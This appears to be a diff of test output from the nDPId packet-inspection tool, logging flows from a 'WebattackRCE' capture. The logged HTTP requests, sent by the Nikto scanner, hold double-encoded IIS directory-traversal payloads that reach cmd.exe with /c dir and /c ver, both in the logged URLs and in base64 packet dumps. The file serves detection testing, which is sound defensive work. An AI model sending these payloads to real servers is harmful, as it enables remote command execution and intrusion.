{"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003295)"}} 
+01100{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":744,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":744,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277893,"flow_last_seen":1576420277893,"flow_idle_time":7580000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"thread_ts_msec":1576420277893,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51050,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003295)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":745,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277895,"flow_last_seen":1576420277895,"flow_idle_time":7580000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1576420277895,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51052,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00723{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":745,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":745,"flow_packet_id":1,"flow_last_seen":1576420277895,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":248,"pkt_l4_len":214,"thread_ts_msec":1576420277895,"pkt":"AAAAAAAAAAAAAAAACABFAADqfTRAAEAGvtd\/AAABfwAAAcdsH5BhnER0\/MAlIYAYAED+3gAAAQEICp1m\/6+dZv+vR0VUIC9paXNhZG1wd2QvLi4lMjU1Yy4uJTI1NWN3aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMjk2KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01095{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":745,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277895,"flow_last_seen":1576420277895,"flow_idle_time":7580000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1576420277895,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51052,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/iisadmpwd\/..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003296)"}} 
+01095{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":745,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277895,"flow_last_seen":1576420277895,"flow_idle_time":7580000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1576420277895,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51052,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/iisadmpwd\/..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003296)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":746,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277896,"flow_last_seen":1576420277896,"flow_idle_time":7580000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":192,"midstream":1,"thread_ts_msec":1576420277896,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51054,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00735{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":746,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":746,"flow_packet_id":1,"flow_last_seen":1576420277896,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":258,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":258,"pkt_l4_len":224,"thread_ts_msec":1576420277896,"pkt":"AAAAAAAAAAAAAAAACABFAAD0gMpAAEAGuzd\/AAABfwAAAcduH5Bs5rmLXk\/vk4AYAED+6AAAAQEICp1m\/7CdZv+wR0VUIC9tc2FkYy8uLiUyNTVjLi4lMjU1Yy4uJTI1NWMuLiUyNTVjd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMyOTcpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01105{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":746,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277896,"flow_last_seen":1576420277896,"flow_idle_time":7580000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":192,"midstream":1,"thread_ts_msec":1576420277896,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51054,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/..%255c..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003297)"}} 
+01105{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":746,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277896,"flow_last_seen":1576420277896,"flow_idle_time":7580000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":192,"midstream":1,"thread_ts_msec":1576420277896,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51054,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/..%255c..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003297)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":747,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277898,"flow_last_seen":1576420277898,"flow_idle_time":7580000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":188,"midstream":1,"thread_ts_msec":1576420277898,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51056,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00730{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":747,"flow_packet_id":1,"flow_last_seen":1576420277898,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":254,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":254,"pkt_l4_len":220,"thread_ts_msec":1576420277898,"pkt":"AAAAAAAAAAAAAAAACABFAADwDYtAAEAGLnt\/AAABfwAAAcdwH5DXOjTMIaH3HYAYAED+5AAAAQEICp1m\/7GdZv+xR0VUIC9wYnNlcnZlci8uLiUyNTVjLi4lMjU1Yy4uJTI1NWN3aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzI5OCkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01101{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":747,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277898,"flow_last_seen":1576420277898,"flow_idle_time":7580000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":188,"midstream":1,"thread_ts_msec":1576420277898,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51056,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pbserver\/..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003298)"}} 
+01101{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":747,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277898,"flow_last_seen":1576420277898,"flow_idle_time":7580000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":188,"midstream":1,"thread_ts_msec":1576420277898,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51056,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pbserver\/..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003298)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":748,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":748,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277899,"flow_last_seen":1576420277899,"flow_idle_time":7580000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277899,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51058,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00714{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":748,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":748,"flow_packet_id":1,"flow_last_seen":1576420277899,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":242,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":242,"pkt_l4_len":208,"thread_ts_msec":1576420277899,"pkt":"AAAAAAAAAAAAAAAACABFAADkYvBAAEAG2SF\/AAABfwAAAcdyH5AooFut2XrcJYAYAED+2AAAAQEICp1m\/7OdZv+zR0VUIC9ycGMvLi4lMjU1Yy4uJTI1NWN3aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzI5OSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01089{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":748,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":748,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277899,"flow_last_seen":1576420277899,"flow_idle_time":7580000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277899,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51058,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/rpc\/..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003299)"}} 
+01089{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":748,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":748,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277899,"flow_last_seen":1576420277899,"flow_idle_time":7580000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277899,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51058,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/rpc\/..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003299)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":749,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":749,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277901,"flow_last_seen":1576420277901,"flow_idle_time":7580000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":1,"thread_ts_msec":1576420277901,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51060,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":749,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":749,"flow_packet_id":1,"flow_last_seen":1576420277901,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":246,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":246,"pkt_l4_len":212,"thread_ts_msec":1576420277901,"pkt":"AAAAAAAAAAAAAAAACABFAADogDVAAEAGu9h\/AAABfwAAAcd0H5COI7lxOfsaCoAYAED+3AAAAQEICp1m\/7WdZv+1R0VUIC9zY3JpcHRzLy4uJTI1NWMuLiUyNTVjd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMzMDApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01093{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":749,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":749,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277901,"flow_last_seen":1576420277901,"flow_idle_time":7580000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":1,"thread_ts_msec":1576420277901,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51060,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003300)"}} 
+01093{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":749,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":749,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277901,"flow_last_seen":1576420277901,"flow_idle_time":7580000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":1,"thread_ts_msec":1576420277901,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51060,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003300)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":750,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":750,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277902,"flow_last_seen":1576420277902,"flow_idle_time":7580000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":1,"thread_ts_msec":1576420277902,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51062,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":750,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":750,"flow_packet_id":1,"flow_last_seen":1576420277902,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":246,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":246,"pkt_l4_len":212,"thread_ts_msec":1576420277902,"pkt":"AAAAAAAAAAAAAAAACABFAADos7FAAEAGiFx\/AAABfwAAAcd2H5DBqortDeq7IYAYAED+3AAAAQEICp1m\/7adZv+2R0VUIC9zY3JpcHRzLy4uJTI1NWMuLiUyNTVjd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYyt2ZXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMzMDEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01093{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":750,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":750,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277902,"flow_last_seen":1576420277902,"flow_idle_time":7580000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":1,"thread_ts_msec":1576420277902,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51062,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%255c..%255cwinnt\/system32\/cmd.exe?\/c+ver","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003301)"}} 
+01093{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":750,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":750,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277902,"flow_last_seen":1576420277902,"flow_idle_time":7580000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":1,"thread_ts_msec":1576420277902,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51062,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%255c..%255cwinnt\/system32\/cmd.exe?\/c+ver","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003301)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":751,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":751,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277903,"flow_last_seen":1576420277903,"flow_idle_time":7580000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277903,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51064,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":751,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":751,"flow_packet_id":1,"flow_last_seen":1576420277903,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1576420277903,"pkt":"AAAAAAAAAAAAAAAACABFAAEFC5dAAEAGMFp\/AAABfwAAAcd4H5DWdjLSA\/QqXoAYAED++QAAAQEICp1m\/7edZv+3R0VUIC9fdnRpX2Jpbi8uLiUyNTVjLi4lMjU1Yy4uJTI1NWMuLiUyNTVjLi4lMjU1Yy4uJTI1NWN3aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzMwMikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01122{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":751,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":751,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277903,"flow_last_seen":1576420277903,"flow_idle_time":7580000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277903,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51064,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/_vti_bin\/..%255c..%255c..%255c..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003302)"}} 
+01122{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":751,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":751,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277903,"flow_last_seen":1576420277903,"flow_idle_time":7580000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277903,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51064,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/_vti_bin\/..%255c..%255c..%255c..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003302)"}} 